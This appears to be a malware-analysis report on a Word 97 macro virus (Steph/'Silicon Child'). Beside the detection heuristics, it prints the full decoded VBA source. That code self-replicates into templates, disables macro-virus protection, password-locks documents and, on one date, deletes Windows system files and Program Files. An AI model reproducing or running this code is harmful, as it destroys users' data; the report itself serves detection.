Malicious Office (OLE) — malware analysis report

Static analysis result for SHA-256 eaf8e990670a579f…

MALICIOUS

Office (OLE)

Size: 38.5 KB
Created: 1998-01-18 10:54:00
Authoring application: Microsoft Word 8.0
First seen: 2012-06-14
MD5: 47e34c422bbccab4b032abdd03a27b8f
SHA-1: 63c3097c829de9c83b58eef0ed80e44fec7c46e3
SHA-256: eaf8e990670a579f0fbfad6300c558750e8d4ee4f70c9030913fdebc52611f37
Risk Score: 316

Malware Insights

MITRE ATT&CK
  • T1059.005 Command and Scripting Interpreter: Visual Basic
  • T1547.001 Boot or Logon Autostart Execution: Registry Run Keys / Startup Folder
  • T1497.001 Virtualization/Sandbox Evasion: System Checks

The sample contains legacy WordBasic and VBA macros, including AutoOpen and AutoClose functions, which are indicative of malicious intent. The VBA script attempts to infect other documents and sets a password on the active document using the string 'StephanieILoveYou_4228250625.00000000'. It also modifies application settings and user information, potentially as part of an infection or evasion routine.

Heuristics (7)

  • ClamAV: Doc.Trojan.Steph-2 [critical] CLAMAV_DETECTION
    ClamAV detected this file as malware: Doc.Trojan.Steph-2
  • VBA macros detected [medium, 4 related findings] OLE_VBA_MACROS
    Document contains VBA macro code
  • Potential Shell call in VBA [critical] OLE_VBA_SHELL
    Potential Shell call in VBA
    Matched line in script:
    Shell ("Attrib -h -r -s c:\windows\system.dat")
  • VBA macro-virus self-replication / AV tampering [critical] OLE_VBA_MACRO_VIRUS_REPLICATION
    VBA macro programmatically rewrites VBA project code through the VBE object model (CodeModule/VBComponents InsertLines/DeleteLines/AddFromString or OrganizerCopy) to copy itself into the global template and other open documents, and/or disables Office macro-virus protection (Options.VirusProtection = False). This is the defining behavior of the W97M document macro-virus family: self-replicating code with no benign document use, independent of any AV signature.
    Matched line in script:
    Options.VirusProtection = False
  • AutoOpen macro [low] OLE_VBA_AUTOOPEN
    AutoOpen macro
    Matched line in script:
    Sub AutoOpen()
  • Auto_Close macro [low] OLE_VBA_AUTOCLOSE
    Auto_Close macro
    Matched line in script:
    Sub AutoClose()
  • Legacy WordBasic macro-virus markers [high] OLE_LEGACY_WORDBASIC_MACRO_VIRUS
    OLE Word document contains legacy WordBasic auto-execution macro markers such as AutoOpen plus ToolsMacro/MacroFile/fileMacro/globMacro or named historical macro-virus strings. These old Word 6/95 macro forms are not exposed as a modern VBA project, so normal VBA source extraction can miss them.

Extracted artifacts (1)

Files carved from inside the sample during analysis.

Filename: macros.bas
Kind: vba-macro
Source: oletools.olevba.extract_macros (decoded VBA source)
Size: 6527 bytes
SHA-256: 03ab8568c5816ce9d160530bd2010bcd06937c3d4aa8279e559b92839046eed0
Detection: ClamAV Doc.Trojan.Steph-2
Obfuscation or payload: unlikely

Preview script (first 1,000 lines of the extracted script):
Attribute VB_Name = "ThisDocument"
Attribute VB_Base = "1Normal.ThisDocument"
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = True
Attribute VB_TemplateDerived = True
Attribute VB_Customizable = True

Attribute VB_Name = "SiliconC"
Private Declare Function SwapMouseButton Lib "user32" (ByVal bSwap As Long) As Long
Private Declare Function ExitWindows Lib "user32" (ByVal dwReserved As Long, ByVal uReturnCode As Long) As Long
Private Declare Function ExitWindowsEx Lib "user32" (ByVal uFlags As Long, ByVal dwReserved As Long) As Long
Sub AutoOpen()
On Error GoTo CHILD
InfectDOC
InfectGlob
Innocence
CHILD:
End Sub
Sub AutoClose()
On Error GoTo CHILD
InfectDOC
InfectGlob
Innocence
ActiveDocument.Password = "StephanieILoveYou_" & Rnd * 4228250625# & Rnd * FFFFFFFFH
ActiveDocument.Save
SwapMouseButton (2)
CHILD:
End Sub
Sub FileSave()
On Error GoTo CHILD:
InfectDOC
InfectGlob
Innocence
ActiveDocument.Password = "StephanieILoveYou_" & Rnd * 4228250625# & Rnd * FFFFFFFFH
ActiveDocument.Save
CHILD:
End Sub
Sub FileSaveAs()
On Error GoTo CHILD:
InfectDOC
InfectGlob
Innocence
ActiveDocument.Password = "StephanieILoveYou_" & Rnd * 4228250625# & Rnd * FFFFFFFFH
Dialogs(wdDialogFileSaveAs).Show
mgsbox "Server Volume : I_LOVE_STEPHANIE Found.", , "File Succesfully Saved"
CHILD:
End Sub
Sub SendMail()
InfectDOC
InfectGlob
ActiveDocument.SendMail
End Sub
Sub Innocence()
On Error GoTo CHILD
        Application.UserName = "Silicon Child"
        Application.UserInitials = "SC"
        Application.UserAddress = "532 Silicon Valley Kln. Angle Of Sin Loves You Stephanie"
        Options.BackgroundSave = False
        Options.CreateBackup = False
        Options.SendMailAttach = True
        Options.EnableSound = False
        Options.WPHelp = False
        Options.CheckSpellingAsYouType = False
        Options.CheckGrammarWithSpelling = False

'I'm not soo sure about the shell command...on some systems it does not load...
' Does a little more than the Wuzzu Virus..... though

    
    If Month(Now) = 3 Then
    MsgBox "I LOVE YOU STEPHANIEY", , "Message from Global Network TCP/IP Instuction"
    End If
    If Day(Now) = 28 And Month(Now) = 8 Then
             Shell ("Attrib -h -r -s c:\windows\system.dat")
             Shell ("Attrib -h -r -s C:\Windows\system.da0")
             Shell ("Attrib -h -r -s C:\Windows\user.da0")
             Shell ("Attrib -h -r -s C:\Windows\user.dat")
             Shell ("Attrib -h -r -s C:\command.com")
             Shell ("attrib -h -r -s C:\autoexec.bat")
              Kill ("c:\command.com")
              Kill ("C:\autoexec.bat")
              Kill ("C:\windows\system.dat")
              Kill ("C:\windows\system.da0")
              Kill ("C:\windows\user.dat")
              Kill ("C:\windows\user.da0")
         MsgBox " A WAR WIll BEING. BROUGHT ON BY NOT A RULER BUT A CHILD PROTECTED BY THE ANGLE OF SIN. THIS WILL BE A DIGITAL WAR. ENERMIES USING THE LATEST DEVICES OF TECHNOLOGY, IT WILL BE A WAR ABOUT ME AND YOU, GOVERNMENT AND PRISONERS AND COPS AND CRIMINALS, THE WILL BE CALLED THE SILiCoN ChIlD. The New World Will Be Run By The SiLiCon ChiLd and By The InFoMaTiOn LibErAtIoN FrOnT.", , "Silicon Child --By Angle Of Sin - POTion Forever"
             Shell ("Deltree  /y C:\Progra~1")
         ExitWindowsEx &H2, FFFFFFFFH
    End If
CHILD:
    
End Sub
Sub FilePrint()
On Error GoTo CHILD
InfectDOC
InfectGlob
Innocence
MsgBox "Error the printer port could not be found or printer name is invalid, please configure system", , "Printer Error"
MsgBox "Error Cannot Spool Document To Printer", , " Spooling Error"
CHILD:
End Sub
Sub ToolsMacro()
On Error GoTo CHILD
InfectDOC
InfectGlob
MsgBox "An Invalid Command Was executed, the last processed command will be terminated", , "Fatal Systematic Error"
CHILD:
End Sub
Sub FilesTemplates()
InfectDOC
InfectGlob
Innocence
MsgBox "File :!#@|@|^& cannot be opened", , "Fatal System Error"
SwapMouseButton &H4

End Sub
Sub EditFind()
InfectDOC
InfecGlob
SwapMouseButton &H4

End Sub
Sub ToolsWordCount()
On Error GoTo CHILD
InfectDOC
SwapMouseButton &H4
InfectGlob
CHILD:
End Sub
Sub ViewVBCode()
On Error GoTo CHILD
InfectDOC
InfectGlob
MsgBox "File Allocation Error: Unable to access segment at CS:1400", , "Memory Allocation Error"
SwapMouseButton &H4
CHILD:
End Sub
Sub InfectDOC()
On Error GoTo CHILD:
Application.ScreenUpdating = False
Application.DisplayAlerts = wdAlertsNone
Angle:

Options.VirusProtection = False
Application.UserName = "Silicon Child"
Application.UserInitials = "SC"
Application.UserAddress = "532 Silicon Valley Kln. Angle Of Sin Loves You Stephanie"
Options.BackgroundSave = False
Options.CreateBackup = False
Options.SendMailAttach = True
DocumentInstalled = False
Options.EnableSound = False
Options.WPHelp = False
Options.CheckSpellingAsYouType = False
Options.CheckGrammarWithSpelling = False
Set ActiveDoc = ActiveDocument
Set GlobalDoc = NormalTemplate
If NormalInstalled = False Then
 Application.OrganizerCopy Source:=NormalTemplate.Name, Destination:=ActiveDocument.Name, Name:="SiliconC", Object:=wdOrganizerObjectProjectItems
 ActiveDocument.SaveAs FileName:=ActiveDocument.Name, FileFormat:=wdFormalTemplate
End If
CHILD:
End Sub
Sub InfectGlob()
On Error GoTo CHILD
Application.ScreenUpdating = False
Application.DisplayAlerts = wdAlertsNone
Angle:

Options.VirusProtection = False

Application.UserName = "Silicon Child"
Application.UserInitials = "SC"
Application.UserAddress = "532 Silicon Valley Kln. Angle Of Sin Loves You Stephanie"
Options.BackgroundSave = False
Options.CreateBackup = False
Options.SendMailAttach = True
Options.EnableSound = False

Set ActiveDoc = ActiveDocument
Set GlobalDoc = NormalTemplate
GlobalInstalled = False
   
For a = 1 To NormalTemplate.VBProject.VBComponents.Count
 If NormalTemplate.VBProject.VBComponents(a).Name = "AngleOfSin" Then
  GloabalInstalled = True
 End If
Next

If GlobalInstalled = False Then
 Application.OrganizerCopy Source:=ActiveDocument.Name, Destination:=NormalTemplate.Name, Name:="SiliconC", Object:=wdOrganizerObjectProjectItems
 Options.SaveNormalPrompt = False
End If
CHILD:
End Sub
' This is a dedication to Stephanie Collinz...the most beautiful girl in the world..
' May be I'm tripping right now but yea!.
' Thanks to ILF for distributing Info....LONG LIVE ILF